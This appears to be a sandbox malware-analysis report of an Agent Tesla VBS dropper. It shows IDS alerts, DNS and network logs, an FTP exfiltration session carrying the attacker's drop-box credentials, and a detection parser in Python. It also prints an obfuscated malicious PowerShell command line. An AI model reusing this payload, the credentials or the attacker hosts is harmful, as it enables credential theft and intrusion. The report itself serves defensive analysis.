              SHA1:9A6DCCDD9D6806F11AB079E1CC65DF964D4DC19A
              SHA-256:8EAF0C298EEAC82C604082157141D067E96B6C6B0B5E895BF5D15AF9959EA385
              SHA-512:B1142E011A380227B8019B22637F04A436138C7473DF91549469B6DFB2E33AD2B3AD685159FDF960C42F659E8D0567F88DDA6DB6AFE65CD72203F595FB82EDBC
              Malicious:false
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i;.c...........!.................'... ...@....... ....................................@..................................&..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......P ..h...........................................................BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID.......|...#Blob...........G.........%3....................0.......................................4.-...............G.(.................................... ;............ M............ ].$.......... m./.......... z.7.......... ..$. ........ ../.'........ ..7.+........ ..7.-........ ..=./...............................
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
              Category:modified
              Size (bytes):872
              Entropy (8bit):5.312266178218381
              Encrypted:false
              SSDEEP:24:Aqd3ka6KgYKEvYVKaM5DqBVKVrdFAMBJTH:Aika67rEvWKxDcVKdBJj
              MD5:0F0859B8EE75C7F44B97667B8E67740B
              SHA1:68F2664181B267168FEDD8751AA7B84BD5B27E95
              SHA-256:A8295C9CCD4AC423E50F826A4689A3EE33179A17A856ABABAA54865A8F9638F6
              SHA-512:974CC9FF0A68542A23DA398F3C172028AC7E9721D8765696FBB4E6DD59D57CA5A0FCA44E1B8EED645BFAC3BE9628D3B03F1A6B93E2D37462D72C7326CB493710
              Malicious:false
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):30
              Entropy (8bit):3.964735178725505
              Encrypted:false
              SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
              MD5:9F754B47B351EF0FC32527B541420595
              SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
              SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
              SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
              Malicious:false
              Preview:NordVPN directory not found!..
              File type:ASCII text, with CRLF line terminators
              Entropy (8bit):5.8757896066938615
              TrID:
                File name:Ordine n.47201 pdf.vbs
                File size:345196
                MD5:c8290bc8659c4a6a45ccd1af9268e400
                SHA1:d2a97dd4fa44d5e2a568d75b764cc47e5878f960
                SHA256:f39968efba7ebe58abba685f5b834f6e0c8393dfaeaf7d08d5f6e625c33a04e1
                SHA512:52cf38b8095759f33affba504463f1d8b44d2497efa1bb21e84e63d75d52a61e45b3327a01d5c0fd54116091273d429066603e2e50dfc9303bddf54f9896f6c5
                SSDEEP:6144:JgYNxYywvF7r/8o1W1iajiYGnCEMDKlM58vbu7bhHZIKK:iVvF7r07iYGCEMejc6KK
                TLSH:5D749E50EFD9191D0D4B3A7A9C831B48F93DCE2611F6F4E96DA8138D3B02658C66F239
                File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
                Icon Hash:e8d69ece869a9ec4
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/28/22-14:53:16.335427 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49726 | 61313 | 192.168.2.7 | 185.31.121.136
11/28/22-14:53:16.290035 | TCP | 2029927 | ET TROJAN AgentTesla Exfil via FTP | 49725 | 21 | 192.168.2.7 | 185.31.121.136

Both alerts point at the same FTP host. The ETPRO "Telegram Exfil" rule fired on the second connection (49726 to 61313) to 185.31.121.136 opened alongside the port-21 control session, which is consistent with an FTP data connection carrying the stolen data rather than with Telegram traffic; the rule name describes the content pattern it matched, not the transport.
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2022 14:52:53.434041023 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.602250099 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.602458000 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.606096983 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.773952961 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.774775028 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.774816036 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.774847031 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.774892092 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.774915934 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.774915934 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.774936914 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.774951935 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.774952888 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.774981022 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.775005102 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.775038958 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.775060892 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.775075912 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.775108099 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.775119066 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.775152922 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.943191051 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943248987 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943280935 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943325996 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943351030 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943372011 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.943392038 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943398952 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.943409920 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943419933 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.943428040 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943444967 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943460941 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.943463087 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943480968 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943485022 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.943499088 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943511009 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.943516016 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943532944 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943542957 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.943551064 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943568945 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943586111 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943587065 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.943603992 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943617105 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.943623066 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943633080 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.943640947 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:53.943664074 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:53.943691015 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:54.111486912 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111556053 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111603975 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111648083 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111684084 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111701965 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111718893 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111737967 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111756086 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111773968 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111792088 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111809969 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111807108 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:54.111828089 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111846924 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111865044 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111882925 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111901045 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111918926 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111936092 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111953974 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111954927 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:54.111970901 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.111989021 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112005949 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112023115 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112040997 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112054110 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:54.112059116 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112076998 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112095118 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112114906 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112133980 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112137079 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:54.112150908 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112169027 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112186909 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112204075 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112221003 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:54.112221956 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112241030 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112257957 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112276077 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112293959 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
Nov 28, 2022 14:52:54.112299919 CET | 49722 | 80 | 192.168.2.7 | 162.240.62.179
Nov 28, 2022 14:52:54.112310886 CET | 80 | 49722 | 162.240.62.179 | 192.168.2.7
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Nov 28, 2022 14:52:53.073584080 CET | 50024 | 53 | 192.168.2.7 | 8.8.8.8
                Nov 28, 2022 14:52:53.413013935 CET | 53 | 50024 | 8.8.8.8 | 192.168.2.7
                Nov 28, 2022 14:53:00.452600956 CET | 49516 | 53 | 192.168.2.7 | 8.8.8.8
                Nov 28, 2022 14:53:00.471657038 CET | 53 | 49516 | 8.8.8.8 | 192.168.2.7
                Nov 28, 2022 14:53:15.682427883 CET | 61392 | 53 | 192.168.2.7 | 8.8.8.8
                Nov 28, 2022 14:53:15.843619108 CET | 53 | 61392 | 8.8.8.8 | 192.168.2.7
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Nov 28, 2022 14:52:53.073584080 CET | 192.168.2.7 | 8.8.8.8 | 0xcbd2 | Standard query (0) | qwedft.gq | A (IP address) | IN (0x0001) | false
                Nov 28, 2022 14:53:00.452600956 CET | 192.168.2.7 | 8.8.8.8 | 0x1219 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                Nov 28, 2022 14:53:15.682427883 CET | 192.168.2.7 | 8.8.8.8 | 0xc173 | Standard query (0) | ftp.mcmprint.net | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Nov 28, 2022 14:52:53.413013935 CET | 8.8.8.8 | 192.168.2.7 | 0xcbd2 | No error (0) | qwedft.gq | | 162.240.62.179 | A (IP address) | IN (0x0001) | false
                Nov 28, 2022 14:53:00.471657038 CET | 8.8.8.8 | 192.168.2.7 | 0x1219 | No error (0) | api.ipify.org | api.ipify.org.herokudns.com | | CNAME (Canonical name) | IN (0x0001) | false
                Nov 28, 2022 14:53:00.471657038 CET | 8.8.8.8 | 192.168.2.7 | 0x1219 | No error (0) | api.ipify.org.herokudns.com | | 52.20.78.240 | A (IP address) | IN (0x0001) | false
                Nov 28, 2022 14:53:00.471657038 CET | 8.8.8.8 | 192.168.2.7 | 0x1219 | No error (0) | api.ipify.org.herokudns.com | | 54.91.59.199 | A (IP address) | IN (0x0001) | false
                Nov 28, 2022 14:53:00.471657038 CET | 8.8.8.8 | 192.168.2.7 | 0x1219 | No error (0) | api.ipify.org.herokudns.com | | 3.220.57.224 | A (IP address) | IN (0x0001) | false
                Nov 28, 2022 14:53:00.471657038 CET | 8.8.8.8 | 192.168.2.7 | 0x1219 | No error (0) | api.ipify.org.herokudns.com | | 3.232.242.170 | A (IP address) | IN (0x0001) | false
                Nov 28, 2022 14:53:15.843619108 CET | 8.8.8.8 | 192.168.2.7 | 0xc173 | No error (0) | ftp.mcmprint.net | | 185.31.121.136 | A (IP address) | IN (0x0001) | false
                • api.ipify.org
                • qwedft.gq
                Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                Nov 28, 2022 14:53:15.934382915 CET | 21 | 49725 | 185.31.121.136 | 192.168.2.7 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                    220-You are user number 2 of 50 allowed.
                    220-Local time is now 15:53. Server port: 21.
                    220-This is a private system - No anonymous login
                    220-IPv6 connections are also welcome on this server.
                    220 You will be disconnected after 15 minutes of inactivity.
                Nov 28, 2022 14:53:15.937089920 CET | 49725 | 21 | 192.168.2.7 | 185.31.121.136 | USER klogz@mcmprint.net
                Nov 28, 2022 14:53:15.977685928 CET | 21 | 49725 | 185.31.121.136 | 192.168.2.7 | 331 User klogz@mcmprint.net OK. Password required
                Nov 28, 2022 14:53:15.977942944 CET | 49725 | 21 | 192.168.2.7 | 185.31.121.136 | PASS l9Hh{#_(0shZ
                Nov 28, 2022 14:53:16.037839890 CET | 21 | 49725 | 185.31.121.136 | 192.168.2.7 | 230 OK. Current restricted directory is /
                Nov 28, 2022 14:53:16.078984976 CET | 21 | 49725 | 185.31.121.136 | 192.168.2.7 | 504 Unknown command
                Nov 28, 2022 14:53:16.079611063 CET | 49725 | 21 | 192.168.2.7 | 185.31.121.136 | PWD
                Nov 28, 2022 14:53:16.120157957 CET | 21 | 49725 | 185.31.121.136 | 192.168.2.7 | 257 "/" is your current location
                Nov 28, 2022 14:53:16.121061087 CET | 49725 | 21 | 192.168.2.7 | 185.31.121.136 | CWD /
                Nov 28, 2022 14:53:16.161766052 CET | 21 | 49725 | 185.31.121.136 | 192.168.2.7 | 250 OK. Current directory is /
                Nov 28, 2022 14:53:16.165164948 CET | 49725 | 21 | 192.168.2.7 | 185.31.121.136 | TYPE I
                Nov 28, 2022 14:53:16.205966949 CET | 21 | 49725 | 185.31.121.136 | 192.168.2.7 | 200 TYPE is now 8-bit binary
                Nov 28, 2022 14:53:16.206445932 CET | 49725 | 21 | 192.168.2.7 | 185.31.121.136 | PASV
                Nov 28, 2022 14:53:16.247524023 CET | 21 | 49725 | 185.31.121.136 | 192.168.2.7 | 227 Entering Passive Mode (185,31,121,136,239,129)
                Nov 28, 2022 14:53:16.290035009 CET | 49725 | 21 | 192.168.2.7 | 185.31.121.136 | STOR PW_user-724536_2022_11_28_14_53_14.html
                Nov 28, 2022 14:53:16.334908009 CET | 21 | 49725 | 185.31.121.136 | 192.168.2.7 | 150 Accepted data connection
                Nov 28, 2022 14:53:16.376401901 CET | 21 | 49725 | 185.31.121.136 | 192.168.2.7 | 226-File successfully transferred
                    226 0.041 seconds (measured here), 11.13 Kbytes per second
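
The FTP exchange above is the credential-theft upload: the client logs in to ftp.mcmprint.net with a hard-coded account, switches to binary mode, asks for passive mode and STORs an HTML report named PW_user-724536_2022_11_28_14_53_14.html; the 227 reply (185,31,121,136,239,129) tells it to open the data connection to 185.31.121.136 on port 239*256+129 = 61313. Because the control channel stays in clear text, USER and PASS, and with them the attacker's drop-box credentials, are visible to any network sensor on the path. The Python below is an added example, not code from the report: it replays the control channel as constructed log lines copied from the table, reconstructs the session state, derives the passive data port and flags the upload; the filename pattern it matches is an assumption generalised from the single sample on this page.

```python
"""Reconstruct the FTP exfiltration session from control-channel lines.

Added example, not code from the report. The lines in SESSION are constructed
from the table above ("C>" client to server, "S>" server to client). The
upload-name pattern is an assumption generalised from the one file seen here.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SESSION = [
    "S> 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------",
    "S> 220-You are user number 2 of 50 allowed.",
    "S> 220-This is a private system - No anonymous login",
    "S> 220 You will be disconnected after 15 minutes of inactivity.",
    "C> USER klogz@mcmprint.net",
    "S> 331 User klogz@mcmprint.net OK. Password required",
    "C> PASS l9Hh{#_(0shZ",
    "S> 230 OK. Current restricted directory is /",
    "S> 504 Unknown command",
    "C> PWD",
    'S> 257 "/" is your current location',
    "C> CWD /",
    "S> 250 OK. Current directory is /",
    "C> TYPE I",
    "S> 200 TYPE is now 8-bit binary",
    "C> PASV",
    "S> 227 Entering Passive Mode (185,31,121,136,239,129)",
    "C> STOR PW_user-724536_2022_11_28_14_53_14.html",
    "S> 150 Accepted data connection",
    "S> 226-File successfully transferred",
    "S> 226 0.041 seconds (measured here), 11.13 Kbytes per second",
]

PASV_RE = re.compile(r"^227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
# Assumed stealer naming, generalised from PW_user-724536_2022_11_28_14_53_14.html.
STEALER_UPLOAD_RE = re.compile(r"^PW_.+_\d{4}(?:_\d{2}){5}\.html$")


@dataclass
class FtpSession:
    user: Optional[str] = None
    password: Optional[str] = None      # only set when PASS crossed the wire in clear
    logged_in: bool = False
    binary_mode: bool = False
    data_endpoint: Optional[Tuple[str, int]] = None
    uploads: List[str] = field(default_factory=list)
    completed_transfers: int = 0


def parse_session(lines: List[str]) -> FtpSession:
    """Walk the control channel once, pairing each server reply with the
    last client verb so a 230 only counts as a login when it answers PASS."""
    s = FtpSession()
    pending = None
    for line in lines:
        side, _, text = line.partition("> ")
        if side == "C":
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                s.user = arg
            elif verb == "PASS":
                s.password = arg
            elif verb == "TYPE" and arg.upper() == "I":
                s.binary_mode = True
            elif verb == "STOR":
                s.uploads.append(arg)
            pending = verb
            continue
        code, final = text[:3], text[3:4] == " "   # "226-" is a continuation line
        if code == "230" and pending == "PASS":
            s.logged_in = True
        elif code == "227":
            m = PASV_RE.match(text)
            if m:
                h1, h2, h3, h4, p1, p2 = (int(g) for g in m.groups())
                s.data_endpoint = (f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2)
        elif code == "226" and final and pending == "STOR":
            s.completed_transfers += 1
    return s


def assess(s: FtpSession) -> List[str]:
    """Turn session state into analyst-facing findings."""
    findings = []
    if s.password is not None:
        findings.append(f"clear-text FTP credentials: {s.user} / {s.password}")
    for name in s.uploads:
        if STEALER_UPLOAD_RE.match(name):
            findings.append(f"stealer-style upload: {name}")
    if s.logged_in and s.completed_transfers and s.data_endpoint:
        findings.append(f"{s.completed_transfers} file(s) delivered via passive "
                        f"data port {s.data_endpoint[1]} on {s.data_endpoint[0]}")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_session(SESSION)):
        print(finding)
```

The same parser works on Zeek or Suricata FTP command logs once they are mapped to the "C>"/"S>" line form; the point of keying the 230 and 226 replies to the preceding client verb is that Pure-FTPd, as seen above, also emits an unrelated 504 in the middle of the session, which a naive "last reply code" approach would misattribute.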


                Target ID:0
                Start time:14:50:11
                Start date:28/11/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs"
                Imagebase:0x7ff650880000
                File size:163840 bytes
                MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:1
                Start time:14:50:12
                Start date:28/11/2022
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:CMD.EXE /c echo C:\Windows
                Imagebase:0x7ff7651b0000
                File size:273920 bytes
                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:2
                Start time:14:50:13
                Start date:28/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6edaf0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:3
                Start time:14:50:18
                Start date:28/11/2022
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo 
